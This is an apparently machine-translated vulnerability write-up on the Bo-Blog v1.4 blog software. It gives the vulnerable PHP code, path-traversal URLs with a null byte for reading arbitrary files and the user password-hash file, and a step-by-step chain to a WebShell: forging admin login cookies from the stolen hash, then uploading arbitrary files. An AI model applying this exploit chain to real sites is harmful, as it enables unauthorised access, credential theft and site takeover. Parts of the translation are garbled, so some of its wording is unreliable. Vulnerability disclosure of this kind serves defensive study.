Bo-Blog v1.4 single-user classification list file read vulnerability + WebShell

This was a few days ago, I found this program, so I went on a set of research (ah, I think there are still some people using the Blog program for 04 years, but now this student has changed the Blog program, A few vulnerabilities have been dug up. In addition to this vulnerability, this program also has a variety of XSS (take the Cookie and directly swarm the Shell, see below) file Inclusion, configuration file writing, file reading ......

Because this system does not have a database, it uses the plain text format to store all kinds of data. Messages and messages are stored directly in the "*. php" file ......, Fortunately, the filter is relatively strict, otherwise Shell and ,..

By: Nuclear

Vulnerability Name:

Bo-Blog v1.4 single-user classification list file read vulnerability + WebShell

Vulnerability files:

Blog. php

Vulnerability code:

If ($ job = "showcat") {// list all entries under a category
If (! File_exists ("$ dirblog/$ Cat. Php ")){
Wronginfo ("This category is not found. ");
}
Unset ($ allfiles );
$ Allfiles = @ file ("$ dirblog/$ Cat. Php ");

Condition of exploits:

Null

Cause:

In the file "blog. php", the function is "category list ".

The parameter "cat =" is not processed. You can directly use "$ allfiles = @ file (" $ dirblog/$ cat. php ");" to read the file.

As a result, if the file name is submitted, the file processing output will be read directly.

Vulnerability Testing:

1. Read index.htm: http://www.bkjia.com/blog. php? Job = showcat & cat = ../index.htm % 00

Vulnerability exploitation:

1, read $ dirblog/userid. php: http://www.bkjia.com/blog. php? Job = showcat & cat = userid

2, read/diruser/userid. php: http://www.bkjia.com/blog. php? Job = showcat & cat = ../diruser/userid

You can exploit this vulnerability to obtain WebShell directly. The procedure is as follows:

1. Access: http://www.bkjia.com/blog. php? Job = showcat & cat = ../diruser/userid (or: http://www.bkjia.com/blog. php? Job = showcat & cat = userid, depending on the path address configured by the blog), get the management password Hash value.

2, access: http://www.bkjia.com/profile. php, get the management account.

3. BecauseThis program puts the account and management password Hash values in Cookies for login verificationSo you can directly log on with the account and management password Hash values without cracking.

4. Modify Cookies: lastvisit = lastvisit; nowuserid = Management ID; nowuserpassword = manage password Hash value

5, refresh the page, has logged in, And then access: http://www.bkjia.com/mblog_upload.php, you can upload any file, get WebShell.

Other information:

Null